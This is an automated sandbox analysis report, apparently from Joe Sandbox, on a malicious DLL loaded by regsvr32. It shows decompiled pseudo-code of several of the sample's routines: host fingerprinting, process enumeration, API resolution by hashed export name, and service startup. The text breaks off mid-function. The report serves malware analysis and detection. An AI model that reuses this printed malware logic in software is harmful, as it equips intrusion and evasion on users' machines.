                                          0x001a2941
                                          0x001a2951
                                          0x001a2957
                                          0x001a295f
                                          0x001a2966
                                          0x001a296f
                                          0x001a2972
                                          0x001a297b
                                          0x001a297e
                                          0x001a297e
                                          0x001a2981
                                          0x001a2981
                                          0x001a2982
                                          0x001a2982
                                          0x001a298c
                                          0x001a298f
                                          0x001a2996
                                          0x001a299c
                                          0x001a29a4
                                          0x001a29ab
                                          0x001a29b1
                                          0x001a29ba
                                          0x001a29bd
                                          0x001a29bd
                                          0x001a29cd
                                          0x001a29cf
                                          0x001a29d0
                                          0x001a29db
                                          0x001a29e2
                                          0x001a29e9
                                          0x001a29f5
                                          0x001a29fc
                                          0x001a2a02
                                          0x001a2a05
                                          0x001a2a08
                                          0x001a2a0b
                                          0x001a2a12
                                          0x001a2a14
                                          0x001a2a1c
                                          0x001a2a1e
                                          0x001a2a24
                                          0x001a2a2c
                                          0x001a2a33
                                          0x001a2a39
                                          0x001a2a39
                                          0x001a2a3d
                                          0x00000000
                                          0x001a2a3d

                                          APIs
                                          • VirtualProtect.KERNEL32(00000000,00000000,00000002,004354D2), ref: 001A2A3D
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.635169240.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_1a0000_regsvr32.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
                                          • Instruction ID: 5aaffcebf35a454bf7c3ccf8cf6fb5ef4a2a11b698d653ca4f40d34c6686ccc5
                                          • Opcode Fuzzy Hash: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
                                          • Instruction Fuzzy Hash: 4E425C72810604EFFF00DFA4C98979A7BB5FF54325F1851AADC0DAE049C77856A4CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E100030B7() {
                                          				int _t3;
                                          				struct _SERVICE_TABLE_ENTRY* _t6;
                                          				int* _t11;
                                          				intOrPtr _t12;
                                          
                                          				_t3 = E10008604(0x10);
                                          				 *0x1001e71c = _t3;
                                          				if(_t3 == 0) {
                                          					L4:
                                          					return _t3 | 0xffffffff;
                                          				} else {
                                          					_t3 = E10008604(0xa);
                                          					_t11 =  *0x1001e71c; // 0x18436e0
                                          					 *_t11 = _t3;
                                          					if(_t3 == 0) {
                                          						goto L4;
                                          					} else {
                                          						_t12 =  *0x1001e688; // 0x1820590
                                          						E1000902D(1, _t3, 7, 8, _t12 + 0x648);
                                          						_t6 =  *0x1001e71c; // 0x18436e0
                                          						 *((intOrPtr*)(_t6 + 4)) = E10003052;
                                          						_t3 = StartServiceCtrlDispatcherA(_t6);
                                          						if(_t3 == 0) {
                                          							goto L4;
                                          						} else {
                                          							return 0;
                                          						}
                                          					}
                                          				}
                                          			}








                                          APIs
                                            • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                          • StartServiceCtrlDispatcherA.ADVAPI32(018436E0), ref: 1000310C
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocCtrlDispatcherHeapServiceStart
                                          • String ID:
                                          • API String ID: 3270895466-0
                                          • Opcode ID: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
                                          • Instruction ID: ac16b269da70e1785f3d8de3b20eaf3184fc588054e4d94b314cf4149a8ccc23
                                          • Opcode Fuzzy Hash: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
                                          • Instruction Fuzzy Hash: 59F03AB42443428BF748CB74DC92B5A3398EB44394F55C128E615CB2D5EE75D8128A14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 91%
                                          			E1000D01F(void* __fp0) {
                                          				long _v8;
                                          				long _v12;
                                          				union _SID_NAME_USE _v16;
                                          				struct _SYSTEM_INFO _v52;
                                          				char _v180;
                                          				short _v692;
                                          				char _v704;
                                          				char _v2680;
                                          				void* __esi;
                                          				struct _OSVERSIONINFOA* _t81;
                                          				intOrPtr _t83;
                                          				void* _t84;
                                          				long _t86;
                                          				void** _t88;
                                          				intOrPtr _t90;
                                          				intOrPtr _t91;
                                          				intOrPtr _t92;
                                          				intOrPtr _t97;
                                          				void* _t98;
                                          				intOrPtr _t103;
                                          				char* _t105;
                                          				void* _t108;
                                          				intOrPtr _t111;
                                          				long _t115;
                                          				signed int _t117;
                                          				long _t119;
                                          				intOrPtr _t124;
                                          				intOrPtr _t127;
                                          				intOrPtr _t130;
                                          				intOrPtr _t134;
                                          				intOrPtr _t145;
                                          				intOrPtr _t147;
                                          				intOrPtr _t149;
                                          				intOrPtr _t152;
                                          				intOrPtr _t154;
                                          				signed int _t159;
                                          				struct HINSTANCE__* _t162;
                                          				short* _t164;
                                          				intOrPtr _t167;
                                          				WCHAR* _t168;
                                          				char* _t169;
                                          				intOrPtr _t181;
                                          				intOrPtr _t200;
                                          				void* _t215;
                                          				long _t218;
                                          				void* _t219;
                                          				char* _t220;
                                          				struct _OSVERSIONINFOA* _t222;
                                          				void* _t223;
                                          				int* _t224;
                                          				void* _t241;
                                          
                                          				_t241 = __fp0;
                                          				_t162 =  *0x1001e69c; // 0x10000000
                                          				_t81 = E10008604(0x1ac4);
                                          				_t222 = _t81;
                                          				if(_t222 == 0) {
                                          					return _t81;
                                          				}
                                          				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                                          				_t83 =  *0x1001e684; // 0x189faa0
                                          				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                                          				_t3 = _t222 + 0x648; // 0x648
                                          				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                                          				_t5 = _t222 + 0x1644; // 0x1644
                                          				_t216 = _t5;
                                          				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                                          				_t227 = _t86;
                                          				if(_t86 != 0) {
                                          					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
                                          				}
                                          				GetCurrentProcess();
                                          				_t88 = E1000BA05(); // executed
                                          				 *(_t222 + 0x110) = _t88;
                                          				_t178 =  *_t88;
                                          				if(E1000BB8D( *_t88) == 0) {
                                          					_t90 = E1000BA62(_t178, _t222);
                                          					__eflags = _t90;
                                          					_t181 = (0 | _t90 > 0x00000000) + 1;
                                          					__eflags = _t181;
                                          					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                                          				} else {
                                          					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                                          				}
                                          				_t12 = _t222 + 0x220; // 0x220, executed
                                          				_t91 = E1000E3F1(_t12); // executed
                                          				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
                                          				_t92 = E1000E3B6(_t12); // executed
                                          				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
                                          				 *(_t222 + 0x224) = _t162;
                                          				_v12 = 0x80;
                                          				_v8 = 0x100;
                                          				_t22 = _t222 + 0x114; // 0x114
                                          				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
                                          					GetLastError();
                                          				}
                                          				_t97 =  *0x1001e694; // 0x189fbf8
                                          				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                                          				_t26 = _t222 + 0x228; // 0x228
                                          				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                                          				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                                          				GetLastError();
                                          				_t31 = _t222 + 0x228; // 0x228
                                          				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
                                          				_t34 = _t222 + 0x114; // 0x114, executed
                                          				_t103 = E1000B7A8(_t34,  &_v692);
                                          				_t35 = _t222 + 0xb0; // 0xb0
                                          				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                                          				_push(_t35);
                                          				E1000B67D(_t103, _t35, _t98, _t241);
                                          				_t37 = _t222 + 0xb0; // 0xb0
                                          				_t105 = _t37;
                                          				_t38 = _t222 + 0xd0; // 0xd0
                                          				_t164 = _t38;
                                          				if(_t105 != 0) {
                                          					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                                          					if(_t159 > 0) {
                                          						_t164[_t159] = 0;
                                          					}
                                          				}
                                          				_t41 = _t222 + 0x438; // 0x438
                                          				_t42 = _t222 + 0x228; // 0x228
                                          				E10008FD8(_t42, _t41);
                                          				_t43 = _t222 + 0xb0; // 0xb0
                                          				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
                                          				_t44 = _t222 + 0x100c; // 0x100c
                                          				E1000B88A(_t108, _t44, _t241);
                                          				_t199 = GetCurrentProcess(); // executed
                                          				_t111 = E1000BBDF(_t110); // executed
                                          				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
                                          				memset(_t222, 0, 0x9c);
                                          				_t224 = _t223 + 0xc;
                                          				_t222->dwOSVersionInfoSize = 0x9c;
                                          				GetVersionExA(_t222);
                                          				_t167 =  *0x1001e684; // 0x189faa0
                                          				_t115 = 0;
                                          				_v8 = 0;
                                          				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                                          					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                                          					_t115 = _v8;
                                          				}
                                          				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                                          				if(_t115 == 0) {
                                          					GetSystemInfo( &_v52);
                                          					_t117 = _v52.dwOemId & 0x0000ffff;
                                          				} else {
                                          					_t117 = 9;
                                          				}
                                          				_t54 = _t222 + 0x1020; // 0x1020
                                          				_t168 = _t54;
                                          				 *(_t222 + 0x9c) = _t117;
                                          				GetWindowsDirectoryW(_t168, 0x104);
                                          				_t119 = E100095E1(_t199, 0x10c);
                                          				_t200 =  *0x1001e684; // 0x189faa0
                                          				_t218 = _t119;
                                          				 *_t224 = 0x104;
                                          				_push( &_v704);
                                          				_push(_t218);
                                          				_v8 = _t218;
                                          				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                                          					_t154 =  *0x1001e684; // 0x189faa0
                                          					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                                          				}
                                          				E100085D5( &_v8);
                                          				_t124 =  *0x1001e684; // 0x189faa0
                                          				_t61 = _t222 + 0x1434; // 0x1434
                                          				_t219 = _t61;
                                          				 *_t224 = 0x209;
                                          				_push(_t219);
                                          				_push(L"USERPROFILE");
                                          				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                                          					E10009640(_t219, 0x105, L"%s\\%s", _t168);
                                          					_t152 =  *0x1001e684; // 0x189faa0
                                          					_t224 =  &(_t224[5]);
                                          					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                                          				}
                                          				_push(0x20a);
                                          				_t64 = _t222 + 0x122a; // 0x122a
                                          				_t169 = L"TEMP";
                                          				_t127 =  *0x1001e684; // 0x189faa0
                                          				_push(_t169);
                                          				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                                          					_t149 =  *0x1001e684; // 0x189faa0
                                          					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                                          				}
                                          				_push(0x40);
                                          				_t220 = L"SystemDrive";
                                          				_push( &_v180);
                                          				_t130 =  *0x1001e684; // 0x189faa0
                                          				_push(_t220);
                                          				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                                          					_t147 =  *0x1001e684; // 0x189faa0
                                          					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                                          				}
                                          				_v8 = 0x7f;
                                          				_t72 = _t222 + 0x199c; // 0x199c
                                          				_t134 =  *0x1001e684; // 0x189faa0
                                          				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                                          				_t75 = _t222 + 0x100c; // 0x100c
                                          				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
                                          				_t76 = _t222 + 0x1858; // 0x1858
                                          				E100122D3( &_v2680, _t76, 0x20);
                                          				_t79 = _t222 + 0x1878; // 0x1878
                                          				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
                                          				_t145 = E1000CD33(_t79); // executed
                                          				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
                                          				return _t222;
                                          			}

                                          APIs
                                            • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                          • GetCurrentProcessId.KERNEL32 ref: 1000D046
                                          • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
                                          • GetCurrentProcess.KERNEL32 ref: 1000D09F
                                          • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
                                          • GetLastError.KERNEL32 ref: 1000D13E
                                          • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
                                          • GetLastError.KERNEL32 ref: 1000D172
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
                                          • GetCurrentProcess.KERNEL32 ref: 1000D20E
                                          • memset.MSVCRT ref: 1000D229
                                          • GetVersionExA.KERNEL32(00000000), ref: 1000D234
                                          • GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
                                          • GetSystemInfo.KERNEL32(?), ref: 1000D26A
                                          • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharDirectoryHeapInfoLookupMultiSystemVersionWideWindowsmemset
                                          • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                          • API String ID: 1775177207-2706916422
                                          • Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                                          • Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
                                          • Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                                          • Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 82%
                                          			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                                          				long _v8;
                                          				char _v16;
                                          				short _v144;
                                          				short _v664;
                                          				void* _t19;
                                          				struct HINSTANCE__* _t22;
                                          				long _t23;
                                          				long _t24;
                                          				char* _t27;
                                          				WCHAR* _t32;
                                          				long _t33;
                                          				void* _t38;
                                          				void* _t49;
                                          				struct _SECURITY_ATTRIBUTES* _t53;
                                          				void* _t54;
                                          				intOrPtr* _t55;
                                          				void* _t57;
                                          
                                          				_t49 = __edx;
                                          				OutputDebugStringA("Hello qqq"); // executed
                                          				if(_a8 != 1) {
                                          					if(_a8 != 0) {
                                          						L12:
                                          						return 1;
                                          					}
                                          					SetLastError(0xaa);
                                          					L10:
                                          					return 0;
                                          				}
                                          				E100085EF();
                                          				_t19 = E1000980C( &_v16);
                                          				_t57 = _t49;
                                          				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                                          					goto L12;
                                          				} else {
                                          					E10008F78();
                                          					GetModuleHandleA(0);
                                          					_t22 = _a4;
                                          					 *0x1001e69c = _t22;
                                          					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                                          					_t24 = GetLastError();
                                          					if(_t23 != 0 && _t24 != 0x7a) {
                                          						memset( &_v144, 0, 0x80);
                                          						_t55 = _t54 + 0xc;
                                          						_t53 = 0;
                                          						do {
                                          							_t27 = E100095C7(_t53);
                                          							_a8 = _t27;
                                          							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                                          							E100085C2( &_a8);
                                          							_t53 =  &(_t53->nLength);
                                          						} while (_t53 < 0x2710);
                                          						E10012A5B( *0x1001e69c);
                                          						 *_t55 = 0x7c3;
                                          						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
                                          						 *_t55 = 0xb4e;
                                          						_t32 = E100095E1(0x1001ba28);
                                          						_a8 = _t32;
                                          						_t33 = GetFileAttributesW(_t32); // executed
                                          						_push( &_a8);
                                          						if(_t33 == 0xffffffff) {
                                          							E100085D5();
                                          							_v8 = 0;
                                          							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
                                          							 *0x1001e6a8 = _t38;
                                          							if(_t38 == 0) {
                                          								goto L10;
                                          							}
                                          							goto L12;
                                          						}
                                          						E100085D5();
                                          					}
                                          					goto L10;
                                          				}
                                          			}

                                          APIs
                                          • OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
                                          • SetLastError.KERNEL32(000000AA), ref: 100060D7
                                            • Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                                            • Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                                            • Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
                                          • GetLastError.KERNEL32 ref: 10005FEF
                                          • memset.MSVCRT ref: 10006013
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
                                          • GetFileAttributesW.KERNEL32(00000000), ref: 10006083
                                          • CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                                          • String ID: Hello qqq
                                          • API String ID: 3435743081-3610097158
                                          • Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
                                          • Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
                                          • Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
                                          • Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 94%
                                          			E1000B7A8(WCHAR* __ecx, void* __edx) {
                                          				long _v8;
                                          				long _v12;
                                          				WCHAR* _v16;
                                          				short _v528;
                                          				short _v1040;
                                          				short _v1552;
                                          				WCHAR* _t27;
                                          				signed int _t29;
                                          				void* _t33;
                                          				long _t38;
                                          				WCHAR* _t43;
                                          				WCHAR* _t56;
                                          
                                          				_t44 = __ecx;
                                          				_v8 = _v8 & 0x00000000;
                                          				_t43 = __edx;
                                          				_t56 = __ecx;
                                          				memset(__edx, 0, 0x100);
                                          				_v12 = 0x100;
                                          				GetComputerNameW( &_v528,  &_v12);
                                          				lstrcpynW(_t43,  &_v528, 0x100);
                                          				_t27 = E100095E1(_t44, 0xa88);
                                          				_v16 = _t27;
                                          				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                          				asm("sbb eax, eax");
                                          				_v8 = _v8 &  ~_t29;
                                          				E100085D5( &_v16);
                                          				_t33 = E1000C392(_t43);
                                          				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                                          				lstrcatW(_t43, _t56);
                                          				_t38 = E1000C392(_t43);
                                          				_v12 = _t38;
                                          				CharUpperBuffW(_t43, _t38);
                                          				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 1000B7C5
                                          • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
                                          • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
                                          • GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821
                                            • Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D
                                          • lstrcatW.KERNEL32 ref: 1000B85A
                                          • CharUpperBuffW.USER32(?,00000000), ref: 1000B86C
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                          • String ID:
                                          • API String ID: 3410906232-0
                                          • Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                                          • Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
                                          • Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                                          • Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 187 1000aba3-1000abc7 CreateToolhelp32Snapshot 188 1000ac38-1000ac3e 187->188 189 1000abc9-1000abf2 memset Process32First 187->189 190 1000ac02-1000ac13 call 1000ccc0 189->190 191 1000abf4-1000ac00 189->191 195 1000ac15-1000ac26 Process32Next 190->195 196 1000ac28-1000ac35 CloseHandle 190->196 191->188 195->190 195->196 196->188
                                          C-Code - Quality: 100%
                                          			E1000ABA3(intOrPtr __ecx, void* __edx) {
                                          				void* _v304;
                                          				void* _v308;
                                          				signed int _t14;
                                          				signed int _t15;
                                          				void* _t22;
                                          				intOrPtr _t28;
                                          				void* _t31;
                                          				intOrPtr _t33;
                                          				void* _t40;
                                          				void* _t42;
                                          
                                          				_t33 = __ecx;
                                          				_t31 = __edx; // executed
                                          				_t14 = CreateToolhelp32Snapshot(2, 0);
                                          				_t42 = _t14;
                                          				_t15 = _t14 | 0xffffffff;
                                          				if(_t42 != _t15) {
                                          					memset( &_v304, 0, 0x128);
                                          					_v304 = 0x128;
                                          					if(Process32First(_t42,  &_v304) != 0) {
                                          						while(1) {
                                          							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
                                          							_t40 = _t22;
                                          							if(_t40 == 0) {
                                          								break;
                                          							}
                                          							_t33 =  *0x1001e684; // 0x189faa0
                                          							if(Process32Next(_t42,  &_v308) != 0) {
                                          								continue;
                                          							}
                                          							break;
                                          						}
                                          						CloseHandle(_t42);
                                          						_t15 = 0 | _t40 == 0x00000000;
                                          					} else {
                                          						_t28 =  *0x1001e684; // 0x189faa0
                                          						 *((intOrPtr*)(_t28 + 0x30))(_t42);
                                          						_t15 = 0xfffffffe;
                                          					}
                                          				}
                                          				return _t15;
                                          			}














                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
                                          • memset.MSVCRT ref: 1000ABD6
                                          • Process32First.KERNEL32(00000000,?), ref: 1000ABED
                                          • Process32Next.KERNEL32(00000000,?), ref: 1000AC21
                                          • CloseHandle.KERNEL32(00000000), ref: 1000AC2E
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
                                          • String ID:
                                          • API String ID: 1267121359-0
                                          • Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                                          • Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
                                          • Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                                          • Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 197 1000dfad-1000dfc4 198 1000e021 197->198 199 1000dfc6-1000dfee 197->199 200 1000e023-1000e027 198->200 199->198 201 1000dff0-1000e013 call 1000c379 call 1000d400 199->201 206 1000e015-1000e01f 201->206 207 1000e028-1000e03f 201->207 206->198 206->201 208 1000e041-1000e049 207->208 209 1000e095-1000e097 207->209 208->209 210 1000e04b 208->210 209->200 211 1000e04d-1000e053 210->211 212 1000e063-1000e074 211->212 213 1000e055-1000e057 211->213 215 1000e076-1000e077 212->215 216 1000e079-1000e085 LoadLibraryA 212->216 213->212 214 1000e059-1000e061 213->214 214->211 214->212 215->216 216->198 217 1000e087-1000e091 GetProcAddress 216->217 217->198 218 1000e093 217->218 218->200
                                          C-Code - Quality: 100%
                                          			E1000DFAD(void* __ecx, intOrPtr __edx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				char _v92;
                                          				intOrPtr _t41;
                                          				signed int _t47;
                                          				signed int _t49;
                                          				signed int _t51;
                                          				void* _t56;
                                          				struct HINSTANCE__* _t58;
                                          				_Unknown_base(*)()* _t59;
                                          				intOrPtr _t60;
                                          				void* _t62;
                                          				intOrPtr _t63;
                                          				void* _t69;
                                          				char _t70;
                                          				void* _t75;
                                          				CHAR* _t80;
                                          				void* _t82;
                                          
                                          				_t75 = __ecx;
                                          				_v12 = __edx;
                                          				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                          				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                          				if(_t41 == 0) {
                                          					L4:
                                          					return 0;
                                          				}
                                          				_t62 = _t41 + __ecx;
                                          				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                          				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                          				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                          				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                          				_t47 = 0;
                                          				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                          				_v8 = 0;
                                          				_v16 = _t63;
                                          				if(_t63 == 0) {
                                          					goto L4;
                                          				} else {
                                          					goto L2;
                                          				}
                                          				while(1) {
                                          					L2:
                                          					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                          					_t51 = _v8;
                                          					if((_t49 ^ 0x218fe95b) == _v12) {
                                          						break;
                                          					}
                                          					_t73 = _v20;
                                          					_t47 = _t51 + 1;
                                          					_v8 = _t47;
                                          					if(_t47 < _v16) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                          				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                          				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                          					return _t80;
                                          				} else {
                                          					_t56 = 0;
                                          					while(1) {
                                          						_t70 = _t80[_t56];
                                          						if(_t70 == 0x2e || _t70 == 0) {
                                          							break;
                                          						}
                                          						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                          						_t56 = _t56 + 1;
                                          						if(_t56 < 0x40) {
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                          					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                          					if( *((char*)(_t56 + _t80)) != 0) {
                                          						_t80 =  &(( &(_t80[1]))[_t56]);
                                          					}
